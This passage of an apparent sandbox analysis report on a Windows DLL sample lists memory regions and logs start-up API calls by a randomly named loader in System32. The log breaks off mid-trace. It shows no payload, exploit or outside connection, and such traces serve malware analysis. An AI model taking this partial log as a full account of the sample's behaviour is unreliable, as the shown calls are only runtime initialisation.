0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1691 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1692 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1693 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1694 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1695 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1696 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1697 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1698 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1699 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1700 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1701 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1702 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1703 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1704 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1705 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1706 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1707 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1708 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1709 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1710 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1711 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1712 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1713 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1714 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1715 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1716 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1717 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1718 start_va = 0x3e0000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1719 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1720 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1721 start_va = 0x770000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Thread: id = 80 os_tid = 0xc2c [0033.715] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf474 | out: lpSystemTimeAsFileTime=0x2cf474*(dwLowDateTime=0xe1c883d0, dwHighDateTime=0x1d3dfba)) [0033.715] GetCurrentProcessId () returned 0xc28 [0033.715] GetCurrentThreadId () returned 0xc2c [0033.715] GetTickCount () returned 0x17905 [0033.715] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf46c | out: lpPerformanceCount=0x2cf46c*=368304642) returned 1 [0033.715] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.716] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.716] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.716] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.716] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.716] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.716] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.716] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.716] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.716] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.716] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.716] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.716] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.717] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.717] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.717] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.717] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.717] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.718] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.718] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.718] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.718] GetCurrentThreadId () returned 0xc2c [0033.718] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"DefaultInstall\"" [0033.718] GetEnvironmentStringsW () returned 0x4a7980* [0033.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x4609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.718] FreeEnvironmentStringsW (penv=0x4a7980) returned 1 [0033.718] GetStartupInfoA (in: lpStartupInfo=0x2cf3c4 | out: lpStartupInfo=0x2cf3c4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.718] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.718] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.718] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.718] SetHandleCount (uNumber=0x20) returned 0x20 [0033.718] GetLastError () returned 0x0 [0033.718] SetLastError (dwErrCode=0x0) [0033.718] GetLastError () returned 0x0 [0033.718] SetLastError (dwErrCode=0x0) [0033.719] GetLastError () returned 0x0 [0033.719] SetLastError (dwErrCode=0x0) [0033.719] GetACP () returned 0x4e4 [0033.719] GetLastError () returned 0x0 [0033.719] SetLastError (dwErrCode=0x0) [0033.719] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.719] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cf3a4 | out: lpCPInfo=0x2cf3a4) returned 1 [0033.719] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cee70 | out: lpCPInfo=0x2cee70) returned 1 [0033.719] GetLastError () returned 0x0 [0033.719] SetLastError (dwErrCode=0x0) [0033.719] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2cee00 | out: lpCharType=0x2cee00) returned 1 [0033.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf284, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf284, cbMultiByte=256, lpWideCharStr=0x2cebe8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.719] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x2cee84 | out: lpCharType=0x2cee84) returned 1 [0033.719] GetLastError () returned 0x0 [0033.719] SetLastError (dwErrCode=0x0) [0033.719] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf284, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf284, cbMultiByte=256, lpWideCharStr=0x2cebb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ哪矲狰Ā") returned 256 [0033.719] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ哪矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.719] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ哪矲狰Ā", cchSrc=256, lpDestStr=0x2ce9a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2cf184, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿalÐô¼ó,", lpUsedDefaultChar=0x0) returned 256 [0033.719] GetLastError () returned 0x0 [0033.719] SetLastError (dwErrCode=0x0) [0033.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf284, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.719] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf284, cbMultiByte=256, lpWideCharStr=0x2cebd8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ哪矲狰Ā") returned 256 [0033.719] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ哪矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.719] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ哪矲狰Ā", cchSrc=256, lpDestStr=0x2ce9c8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2cf084, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿalÐô¼ó,", lpUsedDefaultChar=0x0) returned 256 [0033.719] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.719] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] 